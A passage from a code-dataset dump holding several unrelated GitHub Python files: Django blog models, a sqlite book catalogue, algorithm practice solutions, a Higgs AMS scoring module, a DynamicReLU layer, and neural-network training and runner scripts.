(\"author\", \"published\", \"category\", \"created_by\")\n queryset_names = (\"comments\",)\n \n has_attachments = True\n has_reactions = True\n confirm_delete = True\n has_bookmarks = True\n\n title = models.CharField(max_length=256)\n image = ImageField(upload_to=\"blog_posts\")\n body = HTMLField()\n author = models.ForeignKey(Author, on_delete=models.SET_NULL, blank=True, null=True)\n published = models.BooleanField(default=False)\n category = models.ForeignKey(Category, on_delete=models.PROTECT)\n keywords = models.CharField(max_length=256, blank=True, null=True)\n reads = models.PositiveIntegerField(default=0, blank=True)\n\n @property\n def comments(self):\n return Comment.objects.filter(post_id=self.pk)\n \n @property\n def serialized_author(self):\n return self.author.values_dict(\"id\", \"full_name\") if self.author else None\n \n @property\n def serialized_category(self):\n return self.category.values_dict(\"id\", \"name\")\n\n def set_published(self):\n if not self.updated_by.has_perm(\"blog.publish_post\"):\n self.published = False\n \n def set_author(self):\n if not self.author:\n self.author = self.created_by\n\n def save(self, *args, **kwargs):\n self.set_published()\n return super().save(*args, **kwargs)\n \n def __str__(self):\n return self.title\n\n @classmethod\n def get_filters_form(cls, request: WSGIRequest, _fields: typing.Iterable=None):\n super_form = super().get_filters_form(request, _fields)\n class FilterForm(super_form):\n title__icontains = forms.CharField(label=\"Title\")\n keywords__icontains = forms.CharField(label=\"Keywords\")\n body__icontains = forms.CharField(label=\"Body\")\n id__in = forms.MultipleChoiceField(label=\"ID In\", choices=cls.objects.values_list(\"id\", \"id\"))\n return FilterForm\n\n\nclass Comment(SM):\n class Meta(SM.Meta):\n ordering = (\"-id\", )\n icon = \"fas fa-comment-dots\"\n list_field_names = (\"id\", \"post\", \"text\", \"created_by\", \"username\", \"creation_timestamp\")\n filter_field_names = (\"post\",)\n\n text = models.TextField(max_length=512)\n post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"post_comments\")\n comment = models.ForeignKey(\"self\", on_delete=models.CASCADE, related_name=\"comment_comments\", blank=True, null=True)\n username = models.CharField(max_length=256, blank=True)\n\n @property\n def replies(self):\n return Comment.objects.filter(comment__id=self.id)\n \n @property\n def list_url(self):\n return self.post.detail_url\n \n def set_username(self):\n self.username = str(self.updated_by or self.created_by)\n \n def save(self, *args, **kwargs):\n self.set_username()\n return super().save(*args, **kwargs)\n\n\nclass Following(SM):\n class Meta(SM.Meta):\n unique_together = (\"follower\", \"author\")\n \n icon = \"fas fa-grin-hearts\"\n\n follower = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n author = models.ForeignKey(Author, on_delete=models.CASCADE)\n \n def __str__(self):\n return f\"{self.follower} follows {self.author}\"","repo_name":"mikietechie/sapp_blog","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5850967773","text":"import sqlite3\r\n\r\n\r\ndef connect():\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n cur.execute(\r\n 'CREATE TABLE IF NOT EXISTS book(id INTEGER PRIMARY KEY, title TEXT, author TEXT, year INTEGER, isbn INTEGER, description TEXT)')\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef add_data(title, author, year, isbn, description):\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n cur.execute('INSERT INTO book VALUES(NULL,?,?,?,?,?)', (title, author, year, isbn, description))\r\n # system will auto-increment id of books thus, we pass NULL parameter\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef view():\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT * FROM book')\r\n rows = cur.fetchall() # fetches all rows from query result to get a list of rows\r\n conn.close()\r\n # since we don't have to commit changes for viewing, we directly close the connection instead of conn.commit()\r\n return rows\r\n\r\n\r\ndef search(title='', author='', year='', isbn=''):\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT * FROM book WHERE title=? OR author=? OR year=? OR isbn=?', (title, author, year, isbn))\r\n rows = cur.fetchall()\r\n conn.close()\r\n return rows\r\n\r\n\r\ndef delete(id):\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n # since there is only one parameter thus, we add a comma(,) after the parameter\r\n cur.execute('DELETE FROM book WHERE id=?', (id,))\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef update(id, title, author, year, isbn, description):\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n cur.execute('UPDATE book SET title=?, author=?, year=?, isbn=?, description =? WHERE id =?',\r\n (title, author, year, isbn, description, id))\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\nconnect()\r\nadd_data('Guiding Souls - Dialogues on the Purpose of Life', 'Arun Tiwari, A. P. J. Abdul Kalam', 2005, 9788188322749, \"It deals with the concept of inner experience – thoughts, emotions, feelings, perception, and knowledge among their things.\")\r\nadd_data('Train To Pakistan', 'Khushwant Singh', 1956, 9780143065882, \"It recounts the Partition of India in August 1947 through the perspective of Mano Majra, a fictional border village.\")\r\nadd_data('Trainspotting', 'Irvine Welsh', 1993, 9780749336509, \"The best kind of comedy is based on recognition, and those of us who had grown up in Scotland during the 1980s fell off our barstools reading Irvine Welsh's Trainspotting. The novel has a surreal kind of authenticity, which might sound like a contradiction until you remember what the times were like: times when a feeling of dispossession gave way to a blessed sense of hedonism. All the characters in the book feel totally committed to their own world view in a way that is hilarious and deeply true.\")\r\nadd_data('The Haunting of Hill House', 'Shirley Jackson', 1959, 9780141191449, \"description: The author decided to write 'a ghost story' after reading about a group of nineteenth-century 'psychic researchers' who studied a house and somberly reported their supposedly scientific findings to the Society for Psychic Research.\")\r\nadd_data('Three Men In A Boat', 'K Jerome', 1889, 9788172344436, \"Three wealthy layabouts take a boat trip up the Thames to the amusement of generations of readers. The book was originally intended to be a serious travel guide but, thankfully, it succumbed to the wit of the narrator's anecdotes and remains a warming portrayal of a brilliantly welcoming writer's mind.\")\r\n\r\n# delete(2)\r\n# update(5, 'Three Men In A Boat', 'John Leo', 1889, 9788172344436,\"Three wealthy layabouts take a boat trip up the Thames to the amusement of generations of readers. The book was originally intended to be a serious travel guide but, thankfully, it succumbed to the wit of the narrator's anecdotes and remains a warming portrayal of a brilliantly welcoming writer's mind.\")\r\n# print(view())\r\n# print(search(author='Shirley Jackson'))\r\n","repo_name":"bhagyashreeshirkar/Digital-Book-Catalogue","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"28064554607","text":"import heapq\r\n\r\nn, m = map(int, input().split())\r\n\r\n# 위상정렬 그래프\r\ngraph = [[] for _ in range(n + 1)] # 1-based\r\n# 진입 차수 리스트\r\nindegree = [0 for _ in range(n + 1)]\r\n# 우선순위 큐\r\nque = []\r\n\r\n# 선수문제\r\nfor _ in range(m):\r\n first, last = map(int, input().split())\r\n graph[first].append(last)\r\n indegree[last] += 1 # 진입차수 + 1 해준다\r\n\r\n\r\n# 위상정렬\r\ndef topology_sort():\r\n # 정답 담을 리스트\r\n res = []\r\n # 1. 진입 차수가 0인 노드부터 큐에 삽입\r\n for i in range(1, n + 1):\r\n if indegree[i] == 0:\r\n heapq.heappush(que, i)\r\n # 2. 큐가 빌때까지 반복\r\n while que:\r\n # 큐에서 원소 꺼내기\r\n now = heapq.heappop(que) # 오름차순 정렬 후 추출\r\n res.append(now)\r\n # 2-1. 해당 원소와 연결된 노드들의 진입차수에서 1을 뺀다.\r\n for j in graph[now]:\r\n indegree[j] -= 1\r\n # 2-2. 새롭게 진입차수가 0이 되는 노드를 큐에 삽입\r\n if indegree[j] == 0:\r\n heapq.heappush(que, j)\r\n # 위상정렬 수행한 정답 출력\r\n for r in res:\r\n print(r, end=' ')\r\n\r\n\r\ntopology_sort()\r\n","repo_name":"allzeroyou/Algorithm","sub_path":"백준/Gold/1766. 문제집/문제집.py","file_name":"문제집.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11577364372","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 5 01:57:08 2016\n\n@author: vr308\n\"\"\"\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom scipy.stats.stats import nanmean\nimport tree_model\n\ndef ams_score(model,X_train,X_test,Y_train,Y_test,W_train,W_test,cut,probability_model): \n \n if probability_model == 1:\n prob_train_score = tree_model.model_probability(model, X_train,Y_train) \n prob_test_score = tree_model.model_probability(model, X_test,Y_test)\n else :\n prob_train_score = tree_model.calibrate_probability(model, X_train,Y_train) \n prob_test_score = tree_model.calibrate_probability(model, X_test,Y_test)\n \n # A lot of successful models have shows that the AMS is maximized at threshold of 85%\n \n pcut = np.percentile(prob_train_score,cut)\n \n # The selection region \n \n Yhat_train = prob_train_score >= pcut \n Yhat_test = prob_test_score >= pcut\n \n # Unbiased estimator of expected signal and background events obtained \n # by summing the unnormalized importance weights over each class in the \n \n N_s = 691.98 # Unbiased estimator of number of signal events obtained from full dataset\n N_b = 410999.84 # Unbiased estimator of number of background events obtained from full dataset\n \n sum_of_weights_signal_train_set = sum(W_train*(np.asarray(Y_train)==1.0))\n sum_of_weights_background_train_set = sum(W_train*(np.asarray(Y_train)==0.0))\n sum_of_weights_signal_test_set = sum(W_test*(np.asarray(Y_test)==1.0))\n sum_of_weights_background_test_set = sum(W_test*(np.asarray(Y_test)==0.0))\n\n # To calculate the AMS, first get the true \n # Scale the weights according to fraction of training data used\n\n TruePositive_train = W_train*(np.asarray(Y_train)==1.0)*(N_s/sum_of_weights_signal_train_set)\n FalsePositive_train = W_train*(np.asarray(Y_train)==0.0)*(N_b/sum_of_weights_background_train_set)\n TruePositive_test = W_test*(np.asarray(Y_test)==1.0)*(N_s/sum_of_weights_signal_test_set)\n FalsePositive_test = W_test*(np.asarray(Y_test)==0.0)*(N_b/sum_of_weights_background_test_set)\n \n s_train = sum ( TruePositive_train*(Yhat_train==1.0) ) \n b_train = sum ( FalsePositive_train*(Yhat_train==1.0) )\n s_test = sum ( TruePositive_test*(Yhat_test==1.0) )\n b_test = sum ( FalsePositive_test*(Yhat_test==1.0) ) \n \n ams_train = ams_compute(b_train,s_train)\n ams_test = ams_compute(b_test,s_test)\n \n return ams_train, ams_test\n\n\ndef ams_compute(b,s):\n \n return np.math.sqrt (2.*( (s + b)*np.math.log(1.+s/b)-s))\n \n\ndef average_ams(model,X_train,X_test, Y_train,Y_test, W_train,W_test,cuts,prob,bm):\n \n ams_train_list = []\n ams_test_list = []\n for i in cuts:\n ams_train, ams_test = ams_score(model,X_train,X_test,Y_train,Y_test,W_train,W_test,i,prob,bm)\n ams_train_list.append(ams_train)\n ams_test_list.append(ams_test)\n return nanmean(ams_train_list), nanmean(ams_test_list)\n\ndef ams_curve(model,X_train,X_test,Y_train,Y_test,W_train,W_test,thresh,prob):\n \n ams_train_curve = []\n ams_test_curve = []\n for i in thresh:\n ams_train, ams_test = ams_score(model,X_train,X_test,Y_train,Y_test,W_train,W_test,i,prob)\n ams_train_curve.append(ams_train)\n ams_test_curve.append(ams_test)\n return ams_train_curve,ams_test_curve\n\n \ndef plot_ams_curve(cuts,ams_curve,label):\n \n peak_ams = max(ams_curve)\n best_cut = cuts[ams_curve.index(max(ams_curve))]\n plt.figure()\n plt.grid()\n plt.xlim(min(cuts),max(cuts))\n plt.plot(cuts,ams_curve,'r+-',label='Test AMS')\n plt.axhline(y=peak_ams,label='Peak AMS = '+str(round(peak_ams,2)),color='black',linestyle='--')\n plt.axvline(x=best_cut,linestyle='--',label = 'Best threshold = ' + str(best_cut),color='black')\n plt.xlabel('Threshold (% Rejected)')\n plt.ylabel('AMS Score')\n plt.legend(loc=2)\n plt.title('AMS Curve ' + label) \n \n \n \n#def ams_score(model,X_train,X_test,Y_train,Y_test,W_train,W_test,cut,prob,bm): \n# \n# if prob == 1:\n# prob_train_score = tree_model.model_probability(model, X_train,Y_train) \n# prob_test_score = tree_model.model_probability(model, X_test,Y_test)\n# else :\n# prob_train_score = tree_model.calibrate_probability(model, X_train,Y_train,bm) \n# prob_test_score = tree_model.calibrate_probability(model, X_test,Y_test,bm)\n# \n# \n# # Experience shows me that choosing the top 15% as signal gives a good AMS score.\n# pcut = np.percentile(prob_train_score,cut)\n# \n# # This are the final signal and background predictions\n# \n# Yhat_train = prob_train_score > pcut \n# Yhat_test = prob_test_score > pcut\n# \n# train_frac = len(Y_train)/250000.0\n# test_frac = len(Y_test)/250000.0\n# \n# # To calculate the AMS data, first get the true positives and true negatives\n# # Scale the weights according to fraction\n# \n# TruePositive_train = W_train*(np.asarray(Y_train)==1.0)*(1.0/train_frac)\n# TrueNegative_train = W_train*(np.asarray(Y_train)==0.0)*(1.0/train_frac)\n# TruePositive_valid = W_test*(np.asarray(Y_test)==1.0)*(1.0/test_frac)\n# TrueNegative_valid = W_test*(np.asarray(Y_test)==0.0)*(1.0/test_frac)\n# \n# # Counting the number of signals and background \n# \n# s_train = sum ( TruePositive_train*(Yhat_train==1.0) )\n# b_train = sum ( TrueNegative_train*(Yhat_train==1.0) )\n# s_test = sum ( TruePositive_valid*(Yhat_test==1.0) )\n# b_test = sum ( TrueNegative_valid*(Yhat_test==1.0) ) \n# \n# AMS_Train = ams_compute(b_train,s_train)\n# AMS_Test = ams_compute(b_test,s_test)\n# \n# #print AMS_Train\n# #print AMS_Test \n# \n# return AMS_Train, AMS_Test","repo_name":"vr308/HiggsProject","sub_path":"HiggsDT-master/discovery_significance.py","file_name":"discovery_significance.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26561778165","text":"import torch\nimport torch.nn as nn\n'''\n动态ReLU\nhttps://github.com/Islanna/DynamicReLU\n'''\nclass DyReLU(nn.Module):\n '''\n reduction=8 是性能和计算量权衡的选择。 4较比8提升较弱\n k=2 激活函数中分段函数的个数,常规均为2\n '''\n def __init__(self, channels, reduction=4, k=2, conv_type='2d'):\n super(DyReLU, self).__init__()\n self.channels = channels\n self.k = k\n self.conv_type = conv_type\n assert self.conv_type in ['1d', '2d']\n\n # 类似SE模块,降维再升维 为ab系数生成对应的残差\n self.fc1 = nn.Linear(channels, channels // reduction)\n self.relu = nn.ReLU(inplace=True)\n self.fc2 = nn.Linear(channels // reduction, 2*k)\n self.sigmoid = nn.Sigmoid()\n\n # register_buffer将tensor注册成buffer,其参数 不进行更新\n # ab值= 初始值 + λ*残差值\n self.register_buffer('lambdas', torch.Tensor([1.]*k + [0.5]*k).float()) # λ控制 残差范围\n self.register_buffer('init_v', torch.Tensor([1.] + [0.]*(2*k - 1)).float()) # a\\b系数初始值 a1=1,a2=b1=b2=0,即ReLU.\n def get_relu_coefs(self, x):\n # '2d'时 为GAP全局平均池化 [2,64,112,112] -> [2,64]\n theta = torch.mean(x, axis=-1)\n if self.conv_type == '2d':\n theta = torch.mean(theta, axis=-1)\n # [2,64]-> [2,16] 因为R=4\n theta = self.fc1(theta) # 降维\n theta = self.relu(theta)\n theta = self.fc2(theta) # 升维,得到a、b系数对应的残差\n theta = 2 * self.sigmoid(theta) - 1 # 规范化到-1~1之间\n return theta\n\n def forward(self, x):\n raise NotImplementedError\n\n\nclass DyReLUA(DyReLU):\n def __init__(self, channels, reduction=4, k=2, conv_type='2d'):\n super(DyReLUA, self).__init__(channels, reduction, k, conv_type)\n self.fc2 = nn.Linear(channels // reduction, 2*k)\n\n def forward(self, x):\n assert x.shape[1] == self.channels\n theta = self.get_relu_coefs(x)\n\n relu_coefs = theta.view(-1, 2*self.k) * self.lambdas + self.init_v\n # BxCxL -> LxCxBx1\n x_perm = x.transpose(0, -1).unsqueeze(-1)\n output = x_perm * relu_coefs[:, :self.k] + relu_coefs[:, self.k:]\n # LxCxBx2 -> BxCxL\n result = torch.max(output, dim=-1)[0].transpose(0, -1)\n\n return result\n\n\nclass DyReLUB(DyReLU):\n '''\n 更适合对图像分类等任务\n reduction=8 是性能和速度的权衡\n conv_type='2d' 类似SE模块 '1d'适用语音转文字任务 https://github.com/Islanna/DynamicReLU/issues/2\n '''\n def __init__(self, channels, reduction=8, k=2, conv_type='2d'):\n super(DyReLUB, self).__init__(channels, reduction, k, conv_type)\n self.fc2 = nn.Linear(channels // reduction, 2*k*channels) # 超函数的输出为2KC,覆盖父类的fc2值\n\n def forward(self, x):\n assert x.shape[1] == self.channels\n theta = self.get_relu_coefs(x) # 计算ab值的残差\n\n # ab值= λ*残差值 + 初始值\n # [2,64,4]\n relu_coefs = theta.view(-1, self.channels, 2*self.k) * self.lambdas + self.init_v\n\n if self.conv_type == '1d':\n # BxCxL -> LxBxCx1\n x_perm = x.permute(2, 0, 1).unsqueeze(-1)\n output = x_perm * relu_coefs[:, :, :self.k] + relu_coefs[:, :, self.k:]\n # LxBxCx2 -> BxCxL\n result = torch.max(output, dim=-1)[0].permute(1, 2, 0)\n\n elif self.conv_type == '2d':\n # BxCxHxW -> HxWxBxCx1 permute通道交换[2,64,112,112]->[112,112,2,64]\n x_perm = x.permute(2, 3, 0, 1).unsqueeze(-1)\n # 激活函数 y=ax+b\n output = x_perm * relu_coefs[:, :, :self.k] + relu_coefs[:, :, self.k:]\n # HxWxBxCx2 -> BxCxHxW\n # K=2 表示激活函数内有 两个线性函数,激活其中的最大值\n result = torch.max(output, dim=-1)[0].permute(2, 3, 0, 1)\n\n return result\n","repo_name":"bobo0810/DynamicReLU","sub_path":"dyrelu.py","file_name":"dyrelu.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"95"} +{"seq_id":"36772243313","text":"'''\n서로 다른 정수 N개가 주어지면 정렬한 상태로 리스트 A에 저장한다. 그런 다음 리스트 B에 저장된 M개의 정수에 대해 A에 들어있는 수인지 이진 탐색을 통해 확인하려고 한다.\n전체 탐색 구간의 시작과 끝 인덱스를 l과 r이라고 하면, 중심 원소의 인덱스 m=(l+r)//2 이고, 이진 탐색의 왼쪽 구간은 l부터 m-1, 오른쪽 구간은 m+1부터 r이 된다.\n이때 B에 속한 어떤 수가 A에 들어있으면서, 동시에 탐색 과정에서 양쪽구간을 번갈아 선택하게 되는 숫자의 개수를 알아보려고 한다.\n다음은 10개의 정수가 저장된 리스트 A에서 이진 탐색으로 6을 찾는 예이다.\n예를 들어 10을 찾는 경우 오른쪽-오른쪽 구간을 선택하므로 조건에 맞지 않는다\n5를 찾는 경우 m에 위치하므로 조건에 맞는다.\n이때 m에 찾는 원소가 있는 경우 방향을 따지지 않는다. M개의 정수 중 조건을 만족하는 정수의 개수를 알아내는 프로그램을 만드시오.\n\n[입력]\n첫 줄에 테스트케이스의 수 T가 주어진다. 1<=T<=50\n다음 줄부터 테스트 케이스의 별로 A와 B에 속한 정수의 개수 N, M이 주어지고, 두 줄에 걸쳐 N개와 M개의 백만 이하의 양의 정수가 주어진다.\n1<=N, M<=500,000\n\n[출력]\n\n각 줄마다 \"#T\" (T는 테스트 케이스 번호)를 출력한 뒤, 답을 출력한다.\n\n입력\n3\n3 3\n1 2 3\n2 3 4\n3 5\n1 3 5\n2 4 6 8 10\n5 5\n1 3 5 7 9\n1 2 3 4 5\n\n출력\n#1 2\n#2 0\n#3 3\n'''\nimport sys\nsys.stdin = open('input.txt')\n\nT = int(input())\n\n\nfor tc in range(1, T+1):\n N, M = map(int, input().split())\n A = list(map(int, input().split()))\n B = list(map(int, input().split()))\n # A를 정렬해야 한다고 했으므로 먼저 정렬\n A.sort()\n # 숫자 갯수를 셀 변수 초기화\n cnt = 0\n # B의 원소들을 확인하��� 위해서 M으로 B의 길이를 설정\n for i in range(M):\n # 초기 left, right 값 설정\n L = 0\n R = N-1\n # target 변수 설정\n tar = B[i]\n # 그전과정을 저장해주는 변수\n history = 0 # 1:left , 2:right\n # L이 R을 넘어갈 때 까지 검사\n while L <= R:\n # 문제조건에 나온대로 중앙값 설정\n mid = (L+R)//2\n # 만약 중앙값하고 같아진다면 찾은것\n if tar == A[mid]:\n cnt += 1\n break\n # 만약 중앙값 보다 클때 오른쪽으로 가야한다.\n elif tar > A[mid]:\n # 하지만 이미 오른쪽으로 온상태라면\n if history == 2:\n # 못찾는케이스\n break\n else:\n # 아니라면 L을 갱신하고\n L = mid + 1\n # 기록하기\n history = 2\n # 그반대로 작은경우에는 왼쪽으로가야함\n elif A[mid] > tar:\n # 하지만 이미 왼쪽으로 온상태라면 종료\n if history == 1:\n break\n else:\n # 아니면 똑같이 해줌\n R = mid - 1\n history = 1\n print(f'#{tc} {cnt}')","repo_name":"Jinga02/Algorithm","sub_path":"soving_club/230329/이진 탐색.py","file_name":"이진 탐색.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7293719679","text":"# This program will ask for five numbers and sort them in order of\n# smallest to largest while using the bubble sort algorithm\n# This can also be done by using .sort()\n\ndef main():\n while True:\n print(\"Welcome to the Caesar Cipher Encryptor!\\n\")\n print(\"Give me five numbers, and I'll sort them from smallest to largest!\\n\")\n\n user_input = input(\"Please enter 5 numbers separated by commas: \")\n numbers = [int(num) for num in user_input.split(\",\")] # Convert input to integers\n\n sorted_numbers = bubble_sort(numbers)\n print(f\"Sorted numbers: {sorted_numbers}\")\n\n # Ask if user wants to continue\n another = input(\"Do you want to check another set of numbers? (yes/no): \").lower()\n if another != 'yes':\n break\n\n \ndef bubble_sort(numbers):\n numbers_length = len(numbers)\n \n for i in range(numbers_length - 1):\n flag = 0\n \n for j in range(numbers_length - i - 1):\n if numbers[j] > numbers[j+1]:\n numbers[j], numbers[j+1] = numbers[j+1], numbers[j]\n flag = 1\n \n if flag == 0:\n break\n \n return numbers\n \n\n \n# Call the main function\nmain()\n","repo_name":"ElisaTurner/Sorting-and-Searching","sub_path":"Sorting/BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16663059546","text":"import torch\nimport numpy\nimport sys, os, time\nimport yaml, atexit\nfrom ._version import __version__, __git_sha__\n\nfrom simple_nn.init_inputs import initialize_inputs, check_inputs\nfrom simple_nn.features import preprocess\nfrom simple_nn.models import train\nfrom simple_nn.features.mpi import DummyMPI, MPI4PY\nfrom simple_nn.features.symmetry_function import generate as symf_generator\n\n\ndef run(input_file_name):\n start_time = time.time()\n\n try:\n comm = MPI4PY()\n if comm.size == 1:\n comm = DummyMPI()\n except:\n comm = DummyMPI()\n\n inputs = None\n logfile = None\n if comm.rank == 0:\n logfile = open('LOG', 'w', 1)\n atexit.register(_close_log, logfile)\n inputs = initialize_inputs(input_file_name, logfile)\n\n inputs = comm.bcast(inputs, root=0) \n seed = inputs['random_seed']\n torch.manual_seed(seed)\n numpy.random.seed(seed)\n\n if comm.rank == 0:\n _log_header(inputs, logfile)\n\n if comm.size != 1:\n if inputs['train_model'] is True:\n if comm.rank == 0:\n print(\"MPI4PY does not support in train model. Set train_model: False\")\n comm.barrier()\n raise Exception\n\n errno = 0\n err = None\n if comm.rank == 0:\n errno, err = check_inputs(inputs, logfile)\n check_errno(errno, err, comm)\n\n if inputs['generate_features'] is True:\n generate = get_generate_function(logfile, descriptor_type=inputs['data']['type'])\n generate(inputs, logfile, comm)\n\n if inputs['preprocess'] is True:\n preprocess(inputs, logfile, comm)\n\n if inputs['train_model'] is True:\n train(inputs, logfile, comm)\n\n if comm.rank == 0:\n logfile.write(f\"Total wall time: {time.time()-start_time} s.\\n\")\n\ndef get_generate_function(logfile, descriptor_type='symmetry_function'):\n generator = {\n 'symmetry_function': symf_generator\n }\n\n if descriptor_type not in generator.keys():\n err = \"'{}' type descriptor is not implemented.\".format(descriptor_type)\n raise NotImplementedError(err)\n\n return generator[descriptor_type]\n\ndef _close_log(logfile):\n logfile.flush()\n os.fsync(logfile.fileno())\n logfile.close()\n\ndef _log_header(inputs, logfile):\n # TODO: make the log header (low priority)\n logfile.write(\"SIMPLE_NN v{0:} ({1:})\".format(__version__, __git_sha__))\n logfile.write(\"{:>50}: {:>10}\\n\".format(\"SEED\", inputs[\"random_seed\"]))\n logfile.write(\"{}\\n\".format('-'*88))\n logfile.write(\"{:^88}\\n\".format(\" _____ _ _ _ _ ___ _ _____ __ _ __ _ \"))\n logfile.write(\"{:^88}\\n\".format(\" / ____| | \\ / | '__ \\| | | ___| | \\ | | \\ | |\"))\n logfile.write(\"{:^88}\\n\".format(\"| |___ | | \\ / | |__) | | | |___ ___ | \\ | | \\ | |\"))\n logfile.write(\"{:^88}\\n\".format(\" \\___ \\| | \\/ | ___/| | | ___||___|| |\\ \\| | |\\ \\| |\"))\n logfile.write(\"{:^88}\\n\".format(\" ____| | | |\\ /| | | | |___| |___ | | \\ | | \\ |\"))\n logfile.write(\"{:^88}\\n\".format(\"|_____/|_|_| \\/ |_|_| |_____|_____| |_| \\__|_| \\__|\"))\n logfile.write(\"\\n\")\n\ndef write_inputs(inputs):\n \"\"\"\n Write current input parameters to the 'input_cont.yaml' file\n \"\"\"\n with open('input_cont.yaml', 'w') as fil:\n yaml.dump(inputs, fil, default_flow_style=False)\n\ndef check_errno(errno, err, comm):\n errno = comm.bcast(errno)\n err = comm.bcast(err)\n if errno != 0:\n raise Exception(err)\n\n","repo_name":"MDIL-SNU/SIMPLE-NN_v2","sub_path":"simple_nn/simple_nn.py","file_name":"simple_nn.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"95"} +{"seq_id":"4572330073","text":"from collections import defaultdict\n\nT = int(input())\n\nfor _ in range(T):\n\ts = input()\n\tt = input()\n\t\n\tfor i in range(len(s)):\n\t\tif i == 0:\n\t\t\tcontinue\n\t\tnum = lens - 1 - i\n\t\tif i > 0:\n\t\t\tfor j in range(26):\n\t\t\t\tcheck[num][j] = check[num + 1][j]\n\t\tif check[num][ord(s[num + 1]) - ord('a')] == -1 or check[num][ord(s[num + 1]) - ord('a')] > num:\n\t\t\tcheck[num][ord(s[num + 1]) - ord('a')] = num + 1\n\tinit = check[0].copy()\n\tinit[ord(s[0]) - ord('a')] = 0\n\tresult = 0\n\tlast = 0\n\tfor c in t:\n\t\tnum = ord(c) - ord('a')\n\t\tif result == 0:\n\t\t\tresult = 1\n\t\t\tlast = init[num]\n\t\t\tif last == -1:\n\t\t\t\tresult = -1\n\t\t\t\tbreak\n\t\t\tcontinue\n\t\tlast = check[last][num]\n\t\tif last == -1:\n\t\t\tlast = init[num]\n\t\t\tif last == -1:\n\t\t\t\tresult = -1\n\t\t\t\tbreak\n\t\t\tresult += 1\n\tprint(result)\n\n\n\n\n","repo_name":"Pekaz/problem-solving","sub_path":"codeforces/Educational-Codeforces-Round-81/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7620842568","text":"import torch\nimport torchvision.transforms as transforms\n# from load3dData import load_data\nfrom dataloading_train import load_training_data\nfrom classification_train import train_loop_class\nfrom dataloading_test import load_testing_data\nfrom classification_test import test_model, calculateAccuracy\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--epochs', default=100, type=int)\n parser.add_argument('--batch_size', default=64, type=int)\n parser.add_argument('--training_data_path', type=str, help=\"Set the path to training dataset\")\n parser.add_argument('--testing_data_path', type=str, help=\"Set the path to testing dataset\")\n parser.add_argument('--testing_data_solution_path', type=str,\n help=\"Set the path to solution of testing dataset (for internal testing\")\n parser.add_argument('--lr', default=0.001, type=float, help=\"Learning rate\")\n parser.add_argument('--train', type=bool, default=False, help=\"Use True for training\")\n parser.add_argument('--test', type=bool, default=False, help=\"Use True for testing\")\n parser.add_argument('--model_path', type=str, help=\"Set the path of the model to be tested\")\n args = parser.parse_args()\n print(args)\n\n if not args.train and not args.test:\n raise TypeError(\n \"Please specify, whether you want to run the training or testing code by setting the parameter --train=True or --test=True\")\n if args.train:\n if not args.training_data_path == None:\n # Preprocess training data. When first time called, data is preprocessed and saved to \"my_training_data\".\n # When this folder exists, data is loaded from it directly.\n train_loader, val_loader = load_training_data(args)\n print(\"Number of samples in datasets:\")\n print(\" training: \" + str(len(train_loader.dataset)))\n print(\" validation: \" + str(len(val_loader.dataset)))\n print(\"Shape of data:\")\n print(\" image: \" + str(next(iter(train_loader))[0].shape))\n print(\" target malignancy label: \" + str(next(iter(train_loader))[1].shape))\n # Train model and saves best performing model at model_path.\n model_path = train_loop_class(train_loader, val_loader, args)\n if args.test and not args.testing_data_path == None:\n # Preprocess testing data. When first time called, data is preprocessed and saved to \"my_testing_data\".\n # When this folder exists, data is loaded from it directly.\n test_loader = load_testing_data(args)\n print(\"Number of samples in datasets:\")\n print(\" testing: \" + str(len(test_loader.dataset)))\n args.model_path = model_path\n # Testing data is being predicted and predictions are being saved in folder \"testing_data_prediction_classification\".\n test_model(test_loader, args)\n if not args.testing_data_solution_path == None:\n # Accuracy metric is being calculated between data in folder args.testing_data_solution_path and \"testing_data_prediction_classification\".\n test_acc, test_auc, test_f1s, test_precision, test_recall = calculateAccuracy(args)\n print(\"Testing accuracy: \" + str(test_acc))\n print(\"Testing AUC: \" + str(test_auc))\n print(\"Testing F1: \" + str(test_f1s))\n print(\"Testing Precision: \" + str(test_precision))\n print(\"Testing Recall: \" + str(test_recall))\n else:\n raise TypeError(\n \"Please specify the path to the training data by setting the parameter 